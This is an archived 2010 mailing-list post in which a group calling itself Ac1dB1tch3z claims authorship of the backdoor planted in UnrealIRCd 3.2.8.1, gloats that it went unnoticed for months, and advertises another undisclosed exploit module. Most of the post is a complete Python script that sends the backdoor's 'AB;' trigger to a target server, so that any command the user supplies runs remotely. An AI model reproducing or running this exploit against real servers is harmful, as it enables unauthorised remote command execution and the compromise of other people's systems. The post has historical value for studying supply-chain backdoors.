OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
Re: [Dailydave] Fw: [irc-security] UnrealIRCd 3.2.8.1 backdoored on official ftp and site

ac1db1tch3zgmail.com
Date: Mon Jun 14 2010 - 10:02:51 CDT


Ac1dB1tch3z have been trying to support Full-Disclosure this entire weekend, but our
efforts have failed over and over since the communist party running that list does not
seem to actually care about "Responsible Disclosure" and the publication of information.

ANYWAY:

It seems as if our backdoor was found so we figured we cant include this in the ac1db1tch3z
CANVAS pack (PhosphoricAc1d Exploit pack).

P.S. Since it took months and months for the community to find the system() exploit,
we still have a more complicated zerday unrealircd hack module. Please inquire
when our website is finished.

Brought to you by Ac1dB1tch3z: still using system() like it was 1992AD,
and still owning everyone with it. Thanks.
------------------------------------------------------------------------

$ stat ABunreal.py
 File: `ABunreal.py'
 Size: 830 Blocks: 8 IO Block: 4096 regular file
Device: fd02h/64770d Inode: 16891994 Links: 1
Access: (0777/-rwxrwxrwx) Uid: ( 1003/ ag) Gid: ( 1010/ ag)
Access: 2010-04-05 14:26:14.000000000 -0400
Modify: 2009-11-10 00:04:33.000000000 -0500
Change: 2010-04-05 14:26:59.000000000 -0400

------------------------------------------------------------------------

#!/usr/bin/env python
# Ac1db1tch3z 09

import sys
import socket
import struct

def injectcode(host, port, command):

        host1 = host
        port1 = int(port)
        cmd = command

        print "!##! Ac1db1tch3z is just Unreal #!#%%\n"
        print "- Attacking %s on port %d"%(host1,port1)
        print "- sending command: %s"%cmd

        packet = "AB" +";"+ cmd + ";"+"\n"

        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        try:
            s.connect((host1, port1))
        except socket.error:
            print "No connection..."
            return 0
        s.sendall(packet)
        blah = s.recv(5000)
        print blah
        s.close()

if __name__ == "__main__":
        if len(sys.argv) == 1:
                print "Usage:", sys.argv[0], "<target host> <target port> <command>"
                print
                sys.exit(1)
        else:
                injectcode(sys.argv[1],sys.argv[2],sys.argv[3])
_______________________________________________
Dailydave mailing list
Dailydavelists.immunitysec.com
http://lists.immunitysec.com/mailman/listinfo/dailydave